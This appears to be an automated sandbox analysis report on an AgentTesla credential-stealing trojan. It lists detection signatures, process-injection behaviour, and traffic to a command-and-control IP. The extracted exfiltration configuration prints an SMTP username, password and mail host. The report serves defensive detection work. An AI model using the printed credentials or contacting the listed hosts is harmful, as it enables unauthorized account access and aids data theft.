
Windows Analysis Report W7UbgU8x18

Overview

General Information

Sample Name: W7UbgU8x18 (renamed file extension from none to exe)
Analysis ID: 528611
MD5: 01f140fea9669403791fb89c47138d69
SHA1: c4278cf25da52adc05f4d2161a11c7b96928ccea
SHA256: f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
Tags: 32, AgentTesla, exe, trojan

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • W7UbgU8x18.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\W7UbgU8x18.exe" MD5: 01F140FEA9669403791FB89C47138D69)
    • conhost.exe (PID: 1768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • aspnet_regbrowsers.exe (PID: 4896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • WerFault.exe (PID: 6380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.0.aspnet_regbrowsers.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.0.aspnet_regbrowsers.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.W7UbgU8x18.exe.3938940.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.W7UbgU8x18.exe.3938940.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
2.0.aspnet_regbrowsers.exe.400000.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}
Multi AV Scanner detection for submitted file
Source: W7UbgU8x18.exe, Virustotal: Detection: 35%
Source: W7UbgU8x18.exe, ReversingLabs: Detection: 28%
Machine Learning detection for sample
Source: W7UbgU8x18.exe, Joe Sandbox ML: detected
Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, Avira: Label: TR/Spy.Gen8
Source: W7UbgU8x18.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Joe Sandbox View ASN Name: 24SHELLSUS 24SHELLSUS
                      Source: global traffic HTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: global traffic HTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219
                      Source: global traffic HTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: Joe Sandbox View IP Address: 209.205.200.74 209.205.200.74
                      Source: global traffic TCP traffic: 192.168.2.5:49817 -> 209.205.200.74:587
                      Source: unknown TCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp String found in binary or memory: http://194.85.248.219
                      Source: W7UbgU8x18.exe, 00000000.00000002.303457973.00000000028B2000.00000004.00000001.sdmp String found in binary or memory: http://194.85.248.219/publickey.txt
                      Source: W7UbgU8x18.exe, 00000000.00000000.256041961.0000000000BF9000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp String found in binary or memory: http://194.85.248.219/token_ta992i.txt
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp String found in binary or memory: http://m3kI8gc4jNB3oWFQtMC.org
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com01
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp String found in binary or memory: http://odin.mk-host.com
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp String found in binary or memory: http://sGexjS.com
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                      Source: Amcache.hve.10.dr String found in binary or memory: http://upx.sf.net
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp String found in binary or memory: https://sectigo.com/CPS0
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknown DNS traffic detected: queries for: odin.mk-host.com
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      .NET source code contains very large array initializations
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.cs Large array initialization: .cctor: array initializer size 11957
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02721B00
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272A090
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D40
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271C0
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271BC
